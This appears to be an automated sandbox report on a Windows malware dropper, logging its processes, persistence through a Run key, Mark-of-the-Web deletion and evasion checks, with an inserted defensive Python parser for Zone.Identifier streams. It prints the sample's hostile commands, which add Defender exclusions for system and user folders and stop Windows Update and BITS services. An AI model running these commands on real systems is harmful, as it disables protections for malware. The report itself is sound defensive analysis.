Source: C:\Windows\sysppvrdnvs.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\sysppvrdnvs.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown, Process created: C:\Windows\sysppvrdnvs.exe "C:\Windows\sysppvrdnvs.exe"
Source: C:\Windows\sysppvrdnvs.exe, Process created: C:\Users\user\AppData\Local\Temp\818921588.exe C:\Users\user\AppData\Local\Temp\818921588.exe
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: slc.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\33080.scr, Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\33080.scr, Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\33080.scr, Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\33080.scr, Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\33080.scr, Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\33080.scr, Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\33080.scr, Section loaded: ntmarta.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: apphelp.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: urlmon.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: wininet.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: iertutil.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: srvcli.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: netutils.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: windows.storage.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: wldp.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: uxtheme.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: propsys.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: profapi.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: edputil.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: sspicli.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: wintypes.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: appresolver.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: bcp47langs.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: slc.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: userenv.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: sppc.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: winhttp.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: mswsock.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: winnsi.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: napinsp.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: pnrpnsp.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: wshbth.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: nlaapi.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: dnsapi.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: winrnr.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: fwpuclnt.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: rasadhlp.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: firewallapi.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: fwbase.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: cryptsp.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: rsaenh.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: gpapi.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: urlmon.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: wininet.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: iertutil.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: srvcli.dll
Source: C:\Windows\sysppvrdnvs.exe, Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\818921588.exe, Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\818921588.exe, Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\818921588.exe, Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\818921588.exe, Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\818921588.exe, Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\818921588.exe, Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window Recorder, Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll
Source: Bjl3geiFEK.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Bjl3geiFEK.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Bjl3geiFEK.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Bjl3geiFEK.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Bjl3geiFEK.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Bjl3geiFEK.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Code function: 0_2_004B10B0 Sleep,DeleteFileW,FindWindowA,MoveFileW,DeleteFileW,FindWindowA,MoveFileW,DeleteFileW,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,mbstowcs,mbstowcs,wsprintfW,wsprintfW,PathFileExistsW,mbstowcs,mbstowcs,rand,wsprintfW,mbstowcs,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_004B10B0
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Code function: 0_2_004B1CB1 push ecx; ret 0_2_004B1CC4

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, File created: C:\Users\user\AppData\Local\Temp\33080.scr
Source: C:\Users\user\AppData\Local\Temp\33080.scr, Executable created and started: C:\Windows\sysppvrdnvs.exe
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Code function: 0_2_004B10B0 Sleep,DeleteFileW,FindWindowA,MoveFileW,DeleteFileW,FindWindowA,MoveFileW,DeleteFileW,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,mbstowcs,mbstowcs,wsprintfW,wsprintfW,PathFileExistsW,mbstowcs,mbstowcs,rand,wsprintfW,mbstowcs,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_004B10B0
Source: C:\Users\user\AppData\Local\Temp\33080.scr, File created: C:\Windows\sysppvrdnvs.exe
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe
Source: C:\Windows\sysppvrdnvs.exe, File created: C:\Users\user\AppData\Local\Temp\818921588.exe
Source: C:\Windows\sysppvrdnvs.exe, Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITS
Source: C:\Users\user\AppData\Local\Temp\33080.scr, Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows Settings
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Local\Temp\33080.scr, File opened: C:\Users\user\AppData\Local\Temp\33080.scr:Zone.Identifier read attributes | delete
Source: C:\Windows\sysppvrdnvs.exe, File opened: C:\Windows\sysppvrdnvs.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\sysppvrdnvs.exe, File opened: C:\Users\user\AppData\Local\Temp\264162301.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\sysppvrdnvs.exe, File opened: C:\Users\user\AppData\Local\Temp\229472814.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\sysppvrdnvs.exe, File opened: C:\Users\user\AppData\Local\Temp\818921588.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\sysppvrdnvs.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Process information set: NOOPENFILEERRORBOX
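The "File opened: ...:Zone.Identifier read attributes | delete" rows in this section record the dropper and its payload removing the Mark of the Web from every executable they write, so a later triage of the disk finds no download origin. The parser below for that alternate data stream is an added example, not part of this report or of the sample; the stream layout ([ZoneTransfer] with ZoneId, ReferrerUrl, HostUrl) is the one Windows writes on download, and the URLs in SAMPLE_STREAM are constructed placeholders, not the sample's real host.

```python
"""Parse the Zone.Identifier alternate data stream (the Mark of the Web).

Added example, not part of the Joe Sandbox report.  SAMPLE_STREAM is
constructed to look like the mark 33080.scr would have carried before
the sample deleted it; the URLs are placeholders.
"""
import configparser
import os
from dataclasses import dataclass
from typing import Optional

# URLZONE values as stored in ZoneId.
ZONE_NAMES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
              3: "Internet", 4: "Restricted Sites"}
ZONE_INTERNET = 3


@dataclass
class Motw:
    zone_id: int
    referrer_url: Optional[str]
    host_url: Optional[str]

    @property
    def zone_name(self) -> str:
        return ZONE_NAMES.get(self.zone_id, f"Unknown({self.zone_id})")

    def is_untrusted(self) -> bool:
        """True for Internet / Restricted origins, the zones SmartScreen and Office act on."""
        return self.zone_id >= ZONE_INTERNET


def parse_zone_identifier(stream: str) -> Optional[Motw]:
    """Parse stream text; None if it is not a ZoneTransfer record."""
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read_string(stream)
    except configparser.Error:
        return None
    if not cp.has_option("ZoneTransfer", "ZoneId"):
        return None
    try:
        zone_id = int(cp.get("ZoneTransfer", "ZoneId"))
    except ValueError:
        return None
    return Motw(zone_id,
                cp.get("ZoneTransfer", "ReferrerUrl", fallback=None) or None,
                cp.get("ZoneTransfer", "HostUrl", fallback=None) or None)


def triage(stream: Optional[str]) -> str:
    """One-line verdict; an absent stream means local origin *or* a stripped mark."""
    motw = parse_zone_identifier(stream) if stream is not None else None
    if motw is None:
        return "no MOTW: file is local, was copied without the stream, or the mark was deleted"
    origin = motw.host_url or motw.referrer_url or "unknown host"
    return f"MOTW zone {motw.zone_id} ({motw.zone_name}) from {origin}"


def read_zone_identifier(path: str) -> Optional[str]:
    """Read `path:Zone.Identifier` on Windows/NTFS; None when the stream does not exist."""
    if os.name != "nt":
        raise OSError("alternate data streams are only reachable on Windows/NTFS")
    try:
        with open(path + ":Zone.Identifier", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except FileNotFoundError:
        return None


# Constructed sample; placeholder URLs, not the sample's real download host.
SAMPLE_STREAM = ("[ZoneTransfer]\r\nZoneId=3\r\n"
                 "ReferrerUrl=https://downloads.example.invalid/\r\n"
                 "HostUrl=https://downloads.example.invalid/33080.scr\r\n")

if __name__ == "__main__":
    print(triage(SAMPLE_STREAM))
    print(triage(None))
```

Because the delete leaves nothing to parse, the evidence of origin has to come from elsewhere: the sandbox's file-access log (the "delete" access on the stream itself) or an EDR that records stream deletion, not from the file after the fact.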

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\33080.scr -- Code function: 1_2_0040D770
Source: C:\Windows\sysppvrdnvs.exe -- Code function: 2_2_0040D770
Source: C:\Windows\sysppvrdnvs.exe -- Code function: 17_2_0040D770
Source: C:\Windows\sysppvrdnvs.exe -- Evasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_17-4451)
Source: C:\Users\user\AppData\Local\Temp\33080.scr -- Evasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_1-4451)
Source: C:\Users\user\AppData\Local\Temp\33080.scr -- Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_1-4451)
Source: C:\Windows\sysppvrdnvs.exe -- Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_17-4451)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 7787
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 1787
Source: C:\Users\user\AppData\Local\Temp\33080.scr -- Evaded block: after key decision (graph_1-4467)
Source: C:\Users\user\AppData\Local\Temp\33080.scr -- Evaded block: after key decision (graph_1-4453)
Source: C:\Users\user\AppData\Local\Temp\33080.scr -- Evaded block: after key decision (graph_1-4535)
Source: C:\Windows\sysppvrdnvs.exe -- Evaded block: after key decision (graph_17-4451)
Source: C:\Users\user\AppData\Local\Temp\33080.scr -- Evasive API call chain: RegQueryValue,DecisionNodes,Sleep (graph_1-5407)
Source: C:\Windows\sysppvrdnvs.exe -- Evasive API call chain: RegQueryValue,DecisionNodes,Sleep (graph_2-5878)
Source: C:\Users\user\AppData\Local\Temp\33080.scr -- Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_1-4474)
Source: C:\Windows\sysppvrdnvs.exe -- Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_2-4498)
Source: C:\Users\user\AppData\Local\Temp\33080.scr -- API coverage: 3.7 %
Source: C:\Windows\sysppvrdnvs.exe -- API coverage: 0.9 %
Source: C:\Windows\sysppvrdnvs.exe TID: 340 -- Thread sleep time: -40000s >= -30000s
Source: C:\Windows\sysppvrdnvs.exe TID: 340 -- Thread sleep count: 111 > 30
Source: C:\Windows\sysppvrdnvs.exe TID: 4180 -- Thread sleep time: -53205s >= -30000s
Source: C:\Windows\sysppvrdnvs.exe TID: 6968 -- Thread sleep time: -31490s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5660 -- Thread sleep count: 7787 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4416 -- Thread sleep count: 1787 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7020 -- Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\sc.exe -- WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\sc.exe -- WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe -- Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\33080.scr -- Code function: 1_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\33080.scr -- Code function: 1_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Windows\sysppvrdnvs.exe -- Code function: 2_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
Source: C:\Windows\sysppvrdnvs.exe -- Code function: 2_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Windows\sysppvrdnvs.exe -- Code function: 17_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
